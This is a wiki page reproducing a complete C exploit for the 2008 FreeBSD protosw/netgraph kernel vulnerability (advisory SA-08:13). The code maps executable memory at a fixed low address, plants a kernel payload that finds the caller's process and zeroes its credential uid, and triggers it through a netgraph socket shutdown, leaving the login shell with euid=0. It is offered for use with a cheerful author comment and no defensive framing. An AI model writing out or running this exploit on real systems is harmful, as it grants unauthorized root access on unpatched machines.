討厭的程式

/*
 * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
 * defined here: 
 * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
 *
 * This will overwrite your credential structure in the kernel. This will 
 * affect more than just the exploit's process, which is why this doesn't
 * spawn a shell. When the exploit has finished, your login shell should
 * have euid=0. 
 *
 * Enjoy, and happy holidays!
 *  - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
 */
 
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
 
#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e
 
typedef unsigned long ulong;
typedef unsigned char uchar;
 
int
x(void)
{
	struct proc * p = (struct proc * )PATTERN1;
	uint * i;
 
	while(1)
	{
		if(p->p_pid == PATTERN2)
		{
			i = (uint * )p->p_ucred;
			*++i = 0;
			break;
		}
 
		p = p->p_list.le_next;
	}
 
	return 1;
}
 
int
main(int argc, char * argv[])
{
	ulong addr;
	uchar * c;
	uchar * d;
	uint * i;
	void * v;
	int pid;
	int s;
 
	if(argc != 2)
	{
		fprintf(stderr, "usage: ./x <allproc>\n");
		return 1;
	}
 
	addr = strtoul(argv[1], 0, 0);
 
	v = mmap(
		NULL,
		(PAGES*PAGE_SIZE),
		PROT_READ|PROT_WRITE|PROT_EXEC, 
		MAP_ANON|MAP_FIXED, 
		-1, 
		0);
	if(v == MAP_FAILED)
	{
		perror("mmap");
		return 0;
	}
 
	c = v;
	d = (uchar * )x;
	while(1)
	{
		*c = *d;
		if(*d == 0xc3)
		{
			break;
		}
 
		d++;
		c++;
	}
 
	*c++ = 0xc3;
 
	c = v;
	while(1)
	{
		if(*(long * )c == PATTERN1)
		{
			*(c + 0) = addr >>  0;
			*(c + 1) = addr >>  8;
			*(c + 2) = addr >> 16;
			*(c + 3) = addr >> 24;
			break;
		}
		c++;
	}
 
	pid = getpid();
	while(1)
	{
		if(*(long * )c == PATTERN2)
		{
			*(c + 0) = pid >>  0;
			*(c + 1) = pid >>  8;
			*(c + 2) = pid >> 16;
			*(c + 3) = pid >> 24;
			break;
		}
		c++;
	}
 
	s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
	if(s < 0)
	{
		perror("socket");
		return 1;
	}
 
	shutdown(s, SHUT_RDWR);
 
	return 0;
}
freebsd/quickbsd.txt · 上一次變更: 2010/09/20 05:52 由 jal
上一頁 | 下一頁 | 回首頁 | RSS Feed | Facebook